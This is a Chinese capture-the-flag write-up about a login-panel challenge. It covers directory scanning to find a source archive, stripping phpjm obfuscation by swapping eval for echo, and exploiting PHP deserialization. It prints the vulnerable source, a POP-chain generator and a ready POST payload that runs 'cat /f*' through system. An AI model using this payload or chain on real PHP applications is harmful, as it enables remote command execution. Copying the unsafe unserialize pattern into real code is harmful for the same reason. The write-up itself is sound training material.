6、phpjm混淆解密和php反序列化

题目:青少年雏形系统

1、打开链接也是一个登入面板

2、尝试了sqlmap没头绪

3、尝试御剑,发现一个www.zip

4、下载打开,有一个php文件打开有一段phpjm混淆加密

5、使用手工解混淆

具体解法链接:奇安信攻防社区-phpjm混淆解密浅谈

解密网站:代码在线运行 - 在线工具

将加密的PHP复制到网站,将eval改成echo,点击运行

然后继续之前的将eval换成echo,然后运行

然后成功还原PHP源码

6、源码如下:

php 复制代码
<?php
   error_reporting(0);
   class shi
   {
       public $next;
       public $pass;
       public function __toString(){
           $this->next::PLZ($this->pass);
       }
   }
   class wo
   {
       public $sex;
       public $age;
       public $intention;
       public function __destruct(){
           echo "Hi Try serialize Me!";
           $this->inspect();
       }
       function inspect(){
           if($this->sex=='boy'&&$this->age=='eighteen')
           {
               echo $this->intention;
           }
           echo "🙅18岁🈲";
       }
   }
   class Demo
   {
       public $a;
       static function __callStatic($action, $do)
       {
           global $b;
           $b($do[0]);
       }
   }
   $b = $_POST['password'];
   $a = $_POST['username'];
   @unserialize($a);
   if (!isset($b)) {
       echo "==================PLZ Input Your Name!==================";
   }
   if($a=='admin'&&$b=="'k1fuhu's test demo")
   {
       echo("登录成功");
   }
   ?>

7、根据源码,找出链子

php 复制代码
<?php
class shi{}
class wo{}
class Demo{}
 
$c=new Demo();
$b=new shi();
$a=new wo();
$a->sex='boy';
$a->age='eighteen';
$a->intention=$b;
$b->next=$c;
$b->pass='cat /f*';
echo serialize($a);

8、得到序列化的代码:

php 复制代码
username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":0:{}s:4:"pass";s:7:"cat /f*";}}&password=system

9、得到flag

总结:

1、如果sql注入、弱口令爆破不行,尝试御剑扫目录,会其他收获

2、phpjm混淆解密

相关推荐
黄雪超28 分钟前
JVM——对象模型:JVM对象的内部机制和存在方式是怎样的?
java·开发语言·jvm
luopeng2076634361 小时前
虚拟局域网中配置某台服务器作为网关的方案
运维·服务器·php
爱学习的capoo1 小时前
matlab自控仿真【第一弹】❀传递函数和输出时域表达式
开发语言·matlab
EverBule1 小时前
Python 训练 day46
开发语言·python
蓝婷儿2 小时前
6个月Python学习计划 Day 18 - 项目实战 · 学生成绩管理系统(OOP版)
开发语言·python·学习
HINOTOR_2 小时前
DAY 25 异常处理
开发语言·python
yorushika_2 小时前
python打卡训练营打卡记录day49
开发语言·python·tensorboard·cbam
还是鼠鼠2 小时前
HTTP 请求协议简单介绍
java·开发语言·网络·网络协议·http
on the way 1233 小时前
行为设计模式之Command (命令)
java·开发语言·设计模式
恰薯条的屑海鸥3 小时前
关于我对各开发语言的看法与接下来的文章内容
开发语言·学习·微信小程序·网站开发·全栈开发